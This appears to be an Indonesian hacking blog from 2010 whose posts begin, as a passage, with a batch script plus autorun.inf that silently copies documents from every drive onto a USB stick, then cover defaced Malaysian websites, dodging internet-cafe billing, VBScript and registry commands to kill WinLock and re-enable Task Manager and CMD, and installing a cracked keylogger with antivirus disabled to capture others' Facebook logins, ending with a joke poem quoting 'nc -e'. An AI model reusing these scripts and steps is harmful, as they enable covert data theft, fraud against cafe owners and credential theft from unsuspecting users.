For /f “tokens=*” %%b in (‘dir /a/b/s %%a:\*.doc’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
For /f “tokens=*” %%b in (‘dir /a/b/s%%a:\.xls’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
For /f “tokens=*” %% b in (‘dir /a/b/s%%a:/*.txt’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
For /f “tokens=*” %%b in (‘dir /a/b/s%%a:/*.docx’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
)
  1. Save file tersebut dengan nama terserah .bat dan save as type all files .,udah pa blon??
Sekarang coba di jalankan file dengan exstensi bat tersebut maka di samping File akan terbuat semua file yang di copy dari drive C ampai Z (kalau punya )wkwkwk. gila banyak amat..
Code di atas dapat di ubah atau di tambah sesuai dengan keinginan kalian masing-masing bisa di tambahkan kode
For /f “tokens=*” %%b in (‘dir /a/b/s%%a:\*.zip’) do(
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
maka file yang berextensi zip akan masuk ke Flash Disk kamu (wah lumayan dapat software kompresan gratis wkwkwk)
ubah sesuai extensi apa yang kamu inginkan misalnya *.pdf atau *.html
maka file terserah.bat akan berjalan sesuai dengan keinginan anda .
File tersebut bisa anda ubah ke bentuk extensi exe. .. enak atuh,, lebih mudah.. dengan software Bat_To_Exe_ConverterV1.5 kalau belum punya kakak-kakak bisa download di http://www/brothersoft.com/bat-to-exe-converter-50301.html
Cara mengubahnya adalah
  1. Buka software tersebut..
  2. Pilih yang compile
  3. Dan sekarang file.bat yang tadi kita buat menjadi file yang berextensi *.exe lebih enak kan ..
  4. Agar file tersebut maka kita harus buat file autorun
  5. Buka notepad ketikkan
[autorun]
Open=terserah.exe
  1. save as dengan nama Autorun.inf dan terserah.exe di dalam directory USB Flash Drive kamu..
  2. Selesai .. Akhirnya sekarang colokkan atau masukkan FD kamu atau loe atau agan di pc mana aaja akan terkcopy banyak data yang kamu terima .. thnkz.. tamat
  3. Selamat mencoba ya... Good Luck........

Wednesday, September 1, 2010

Hacker Indonesia ‘Kencingi’ 500 Lebih Situs Malaysia

KAMI SEBAGAI BANGSA INDONESIA TIDAK AKAN DIAM
dan inilah cara kami untuk membalas perlakuan kalian terhadap INDONESIA !!!


http://bluediaries.net/indonesia.html
http://cungdinh.com/indonesia.htm
http://greenconcerns.com/indonesia.htm
http://macrogroup.com.my/indonesia.htm
http://nataliensis.net//indonesia.htm
http://njs.com.my/indonesia.htm
http://perwirak9.org/indonesia.htm
http://pinnaclepremium.com/indonesia.htm
http://pointray.com.my/indonesia.htm
http://rebanajaya.com/indonesia.htm
http://sc555.com.my/indonesia.htm
http://trainpro.com.my/indonesia.htm
http://tohth.com/indonesia.htm
http://setara.com.my/indonesia.htm
http://walkabout.com.my/indonesia.htm
http://wanly.com.my/indonesia.htm
http://wusenses.com/indonesia.htm
http://ybfurniture.com/indonesia.htm
http://claudia-timepieces.com/indonesia.htm
http://comlenia.com/indonesia.html
http://exoilsantrading.com/indonesia.html
http://gincafe.com.my/indonesia.html
http://gmsmalaysia.com/indonesia.html
http://www.i-respondent.com/indonesia.htm
http://kdesigncollection.com/indonesia.html
http://lifecare.com.my/indonesia.html
http://lss-academy.com/indonesia.html
http://nurbeautyline.com.my/indonesia.html
http://ocmeritplastic.com/indonesia.html
http://prestij.com.my/indonesia.html
http://secretani.com/indonesia.html
http://specolor.com.my/indonesia.html
http://squarecircleantiques.com/indonesia.html
http://stephenfoong.com/indonesia.html
http://swisstech.com.my/indonesia.html
http://ur2u.com/indonesia.html
http://wawasanintact.com/indonesia.html
http://wishmenu.com.my/indonesia.html
http://www.kedah.edu.my/indonesia.html
http://accerevent.com/indonesia.html
http://caliph.com.my/indonesia.html
http://dmdigital.com.my/indonesia.html

Masih Bnayak Lagi...... ^_^


Tuesday, June 22, 2010

Bagaimana Menyusun Program C

Dalam banyak posting saya sebelumnya khususnya di PENCIPTAAN VIRUS bagian, saya telah menggunakan C sebagai bahasa pemrograman.Jika Anda baru untuk pemrograman C dan sulit untuk mengkompilasi kode sumber C maka posting ini adalah untuk Anda.
Berikut ini adalah prosedur langkah-demi-langkah untuk menginstal kompiler Borland C + + 5.5 dan mengkompilasi program C.
How to install Borland C++ compiler Bagaimana menginstal Borland C + + compiler

1. 1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link. Download Borland C + + compiler 5.5 (untuk platform Windows) dari link berikut.

Link

2. Setelah Anda mendownload, jalankan freecommandlinetools.exe.

C:\Borland\BCC55 C: \ Borland \ BCC55
How to configure Borland C++ compiler Bagaimana mengkonfigurasi Borland C + + compiler

1. Setelah Anda menginstal Borland C + + compier, menciptakan dua Dokumen baru Teks

2. Buka Teks Document.txt Baru pertama file dan menambahkan dua baris berikut ke dalamnya

-I”c:\Borland\Bcc55\include” -I "c: \ Borland \ Bcc55 \ meliputi"

-L”c:\Borland\Bcc55\lib” -L "c: Borland \ \ \ lib Bcc55"

Simpan perubahan dan tutup file.Sekarang mengubah nama file dari New Teks Document.txt untuk bcc32.cfg.

3. Buka kedua New Text Document (2) file. Txt dan tambahkan baris berikut ke dalamnya

-L”c:\Borland\Bcc55\lib” -L "c: Borland \ \ \ lib Bcc55"

Simpan perubahan dan tutup file.Sekarang mengubah nama file dari New Text Document (2) ilink32.cfg. Txt ke.

4. Sekarang salin kedua file bcc32.cfg dan ilink32.cfg, arahkan ke C: \ Borland \ BCC55 \ Bin dan tempelkan.
Cara mengkompilasi kode sumber C (C file.)

1. Anda perlu menempatkan C (example.c). File yang akan dikompilasi di lokasi berikut

C:\Borland\BCC55\Bin C: \ Borland \ BCC55 \ Bin

2. Sekarang goto prompt perintah (-> jenis-> Run Start cmd - Masukkan>)

3. Membuat jalur berikut sebagai direktori kerja sekarang (gunakan perintah CD)

C:\Borland\BCC55\Bin C: \ Borland \ BCC55 \ Bin

4. Untuk mengkompilasi file (example.c) gunakan perintah berikut

bcc32 example.c bcc32 example.c

5. Sekarang jika tidak terdapat kesalahan dalam kode sumber Anda akan mendapatkan file eksekusi (example.exe) di lokasi yang sama (C: \ Borland \ BCC55 \ Bin).

6. Sekarang Anda telah berhasil mengkompilasi kode sumber menjadi file executable (.. Exe file).


Sunday, June 6, 2010

Bermain Warnet Gratis

Loe Pada Mao Maen Warnet Gratisan?
Yuk Maen Warnet Gratis , Gratisan Maen Di warnet Griya And sekitarnya, Tapi Gimana Caranye? Pusing Gw ni Gak Punya Duit! Warnet Gratis Dimana Ya?
PUSING LOE KAN?? Ni Deh Gw Kasi Caranya, dapet dari nyari nyari juga ni:
Heey semuanyaaa! Berjumpa lagi dengan sayaa di tips dan trik! Hahahaaa… Di trik dan tips kali ini aku mau ngejelasin trik tips mengakali warnet dengan menggunakan ZHider! Di sini kita bakalan mencoba berinternet ria di warnet secara murah meriah!! Caranya gampaang! Kalian cuman perlu download Zhider di sini. Untuk selanjutnyaa, aku bakal ngejelasin dulu tentang sistem billing di warnet.

Contoh screen status yg ada di warnet (edelweis)

Kalian pasti pernah khan ke warnet?? Naah, klo pernah pasti kalian bakal muncul halaman login di komputer yg kalian pake di warnet. Itu sebetulnya saat muncul layar login, komputer dah bisa dipake buat browsing. Cuman keganggu ajah sama layar login yg mengharuskan kita untuk mengisi layar login tersebut sehingga kitapun kudu bayar. Nah, dengan menggunakan ZHider, kita bisa menyembunyikan layar login dengan mudaah! Caranya bener2 sederhanaa!
Berikut ini langkahnyaaa:
  1. Pastikan warnet yg kamu pilih masih banyak bilik/kamar yg kosong. Soalnya klo rame ntar operator curiga kenapa masih ada bilik yg kosong?
  2. Baiknya sih kamu pilih bilik yg paling jauh dari operator warnet biar gak ketauan bilik kamu kosong atau ngga.
  3. Nyalakan komputer di depan kamu klo masih dalam keadaan mati.
  4. Klo ada login screen, kamu login ajah kaya biasa.
  5. Jalanin ZHider yg udah kamu download di sini, klo bisa dari rumah dimasukin ajah ke flashdisc atau disket biar gak usah download di warnet.
  6. Klo ZHider dah dibukaa, langsung ajah logout.
  7. Ntar pasti muncul login screen, kamu pencet CTRL+ALT+Z
  8. Dan login screennya menghilaang! Kamu bisa browsing sepuas-puasnya sampai matiiii! MERDEKAAAAA!!!!!!!
  9. Klo dah puas, kamu pencet CTRL+ALT+X untuk menampilkan kembali login screen yg udah kita sembunyikan tadi.
  10. Login seperti biasaa, kamu browsing2 dulu beberapa menit sampai penunjuk waktunya di atas 5 menit. Tujuannya biar operator warnet gak curiga.
  11. Logout, pasang muka babyface seolah-olah tanpa dosa, dan bayar tarif!
  12. DONNNNEEEEEEEEE!!!!! OYEAAAAAHH!!
Ini khusus untuk warnet yg punya operator yg gak kenal kamu, atau operatornya sering tidur, atau operator yg bisanya cuman nerima pembayaran ajaa (baca: TOLOL).
Dan berikut ini beberapa hotkeys yg ada di ZHider. Untuk lebih lengkapnya baca ajah readmenya:
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Aku kasih tips dan trik bukan berarti aku mau kalian internetan gratis di warnet sembarangan. Ini cuman buat kalian yg depresi, stres, sampai2 pengen bunuh diri karena saking pengennya online tapi dompet tipis. Lagian aku juga cuman pengen share ajah kok! Gak ada maksud apa2! Hehehehe…
Nah, Okeh! Selamat Mencobaaa…! Saya gak nanggung klo kalian ketauan!wkwkkwkkwkwk" kalo Ketauan Kalo Bisa Kabur, Kabur aja ya...hahahah"Seru"..." by:Aditya
~ G O O D L U C K !~

Hacking Winlock Warnet

Tutorial Iseng Di Warnet Versi Winlock
Okey, Pasti semua udah tau winlock itu apa kan ?
Kalo blom tau search aja di google yah..
Ya intinya sih winlock itu digunakan buat mengurangi akses kita terhadap komputer tersebut.
Misalkan, gak bisa download atau gak bisa buka Drive di komputer tersebut.
Contohnya aja Warnet Di perum Griya and Bekasi....
Dan Masih banyak lagi warnet-warnet yang menggunakan aplikasi ini.
Disini saya cuma mau sharing aja pengalaman saya menjadikan diri sebagai admin winlock tersebut. Jiahahahah.
Sebenernya saya cuma iseng-iseng sedikit di WARNET.. hehehhehe
OK. Yang dibutuhin cuma 1. Notepad / Wordpad.
ikirkan gimana caranya buat buka notepad tersebut. Banyak caranya.
Dari sound device pun bisa buka notepad. Dan langganan saya buat buka notepad/wordpad sih pake Lagu Gratisan dari windows itu loh, yang di sample music. hahaha..
Ya tinggal save as – pilih desktop – terus save dengan ekstensi .txt / .doc deh..
OK langsung aj yah, udah dibuka notepad/wordpad ?
Usahakan cek dulu ada deepfreeze atau kagak.
Kalo ada deepfreeze kan bisa ngilangin jejak deh dengan restart komputer.
Dan kalo gak ada deepfreeze musti ikutin cara kedua ntar.
Copy script ini
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
Set colProcessList = objWMIService.ExecQuery _
(“Select * from Win32_Process Where Name = ‘winlock.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next



Const HKEY_CLASSES_ROOT = &H80000000
strComputer = “.”
Set objRegistry=GetObject(“winmgmts:\\” & _
strComputer & “\root\default:StdRegProv”)

strKeyPath = “CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID”
strValueName = “ID”

objRegistry.DeleteValue HKEY_CLASSES_ROOT, strKeyPath, strValueName
Dan save pake ekstensi .vbs (VBScript) dan klik 2x aja buat menjalankannya.
Sebenernya itu 2 script yang dijadikan 1 karena kesamaan ekstensi.
Keterangan :
Script 1 : Buat kill winlock.exe, karena biasanya task manager di disable kan ?
Script 2 : Buat delete key “ID” Winlock di regedit yang berada di CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID
OK. Sekarang step 2. (AKTIFKAN TASK MANAGER)
Kenapa pake aktifkan TASKMGR? Karena disini kita bakal aktifin cmd (Command Prompt).
Kalo taskmanager / startnya gak didisable, bisa langsung aja buka commandprompt di accesories.
Dan coba aja windows+R, kalo bisa, ya langsung aj copy script aktifkan command promptnya dibawah.
/// Program Ramping Mengamankan Task Manager
// Nama Program: tsk_mgr.js
function prakata(pesan)
{
natan.popup(pesan,0,”Menjaga Task Manager”);
}
function catat(harga)
{
natan.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion”+
“\\Policies\\System\\DisableTaskMgr”,harga,”REG_DWORD”);
}
var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, natan;
natan = WScript.CreateObject(“WScript.Shell”);
pesan = “Menu Pilihan :\n\n”+
“Klik [Yes] untuk Nonaktifkan Task Manager.\n”+
“Klik [No] untuk Aktifkan Task Manager.\n”+
“Klik [Cancel] untuk Keluar.\n\n”+
“[+] http:www.suicidalizm.co.cc [+]\n\n”+
“NonAktifkan Task Manager sekarang?”;
tanya = natan.popup(pesan,0,”Menjaga Task Manager”,vbYesNoCancel);
if (tanya == vbYes)
{
harga=1;
pesan=”Task Manager DiNonAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else if (tanya == vbNo)
{
harga=0;
pesan=”Task Manager DiAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else
{
pesan=”visit http://www.suicidalizm.co.cc”;
prakata(pesan);
}

Save dengan ekstensi .js dan jalankan, lalu pilih NO buat mengaktifkan task manager.
Lalu buka task manager (ctrl+alt+del) – Pilih tab users – Klik menu File – Pilih Run – Lalu copy paste script ini di situ
REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f
Ini fungsinya buat mengaktifkan command prompt.
Lalu dengan cara yang sama, ketik cmd untuk membuka command prompt.
Setelah masuk command prompt, Silahkan cari dimana folder winlock berada.
Misalkan berada di folder C:\program files\winlockpro
Ketik C: lalu enter Ketik cd program files lalu enter
Ketik cd winlockpro lalu enter
Dan ketik winlock.exe lalu enter
TADA… sekarang anda winlock baru pun sudah berjalan, dan silahkan shutdown/kill winlock.exe yang baru biar gak mengganggu.
Sekarang anda bebas mau ngapain aj. Mau Download/Colok USB/dll pokoknya bisa deh. Kan udah jadi admin Seru kan.... "Good luck"


Cara Menggunakan Keylogger


Sebelum saya membahas tentang Tutorial Menggunakan Keylogger, ada baiknya saya menjelaskan terlebih dahulu apa itu keylogger. Munkgkin sobat-sobat blogger ada yang belum tahu, dan bagi yang sudah tahu tentang keylogger ini, mohon koreksinya bila menemukan kesalahan di tutorial saya ini. Okeh?? Hehehe

Keyloger, apa itu keylogger?? kalau menurut saya, keylogger adalah sebuah software atau piranti lunak yang berfungsi untuk mencatat segala aktivitas yang kita lakukan di computer. Mulai dari kita menekan a-z, 0-9, kombinasi keyboard seperti ctrl+C dan lain-lain akan tercatat oleh keylogger.

Cara kerja keyloger bersifat hidden (tersembunyi). Biasanya dia akan muncul di systray jika kita melakukan kombinasi keyboard (shortcut tertentu).
Keren sekaligus menakutkan kan sob?? coba kalau keylogger di instal di warnet?? facebook orang pun dengan mudah bisa kita ambil alih.

Pesan saya, sebaiknya keylogger ini dipergunakan dengan bijak, karena perbuatan yang kita tanam hari ini kita akan memetik hasilnya di masa yang akan datang. Dan yang penting, segala perbuatan yang anda lakukan, saya tidak bertangggung jawab atas semua yang terjadi. disini saya hanya sharing aja ke sobat-sobat blogger. Anda setuju dan mengerti?? bila setuju dan mengerti silakan lanjutkan membacanya, dan bila tidak silakan cari bacaan yang lain. Hehehe

Okeh, kita lanjutkan sob.
Sebelumnya, silakan anda download keylogger di link yang saya sediakan dibawah. Bila sudah, segera ekstrak dan lakukan instalasi. Ikuti step-step yang ada hingga proses instalasi pun selesai.

Bila sudah, tutup keylogger. Ko ditutup?? karena kita akan meng-crack keylogger agar menjadi fullversi. anda pasti suka kan?? Gratiss gitu, Hehehe
Copy-paste ctfmon.exe dan Serial.key dari folder crack ke foleder tempat anda menginstal keylogger. Secara default keylogger terinstal di C:\WINDOWS\system32\CTF.
Kemudian jalankan program.. Taraaa,, keylogger anda kini sudah menjadi fullversion.

Sekarang coba anda menuliskan sesuatu, bila sudah, coba buka keylogger nya dengan cara menclick 2x atau klik kanan lalu pilih yang view log. Maka akan tampil seperti ini,

Bagaimana sob?? keren kan?? kalau begitu, tunggu apa lagi, download aja langsung di link dibawah ini.

NB: Sebelum anda menginstal keylogger, sebaiknya matikan/disable terlebih dahulu antivirus anda, karena keylogger adalah program terlarang jadi wajar saja antivirus harus di disable. Hehehe
SELAMAT MENCOBA
Download Crack

Download Family Keylogger

Surat Cinta Seorang Hacker

Seandainya hatimu adalah sebuah system,
maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,
tapi aku hanya berani ping di belakang anonymouse proxy,
inikah rasanya jatuh cinta
sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu,
pake PHP injection Terus aku ls -la; find / -perm 777 -type d,
sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?.
apa aku harus pasang backdor "Remote Connect-Back Shell"
jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq
untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,
aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry,
dan menyeting error pagemu " The page cannot be found Coz Has Been Owned by Someone get out!"
aku janji gak bakalan ada macelinious program
atau service yang hidden,
karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system,
jangan ada kata "You dont have permission to access it" untuk aku,
kalau ga mau di ping flood Atau DDos Attack jangan ah....! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, ...?

Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan,
Ga ada anti virus yang dapat menangkalnya selain ...kamu.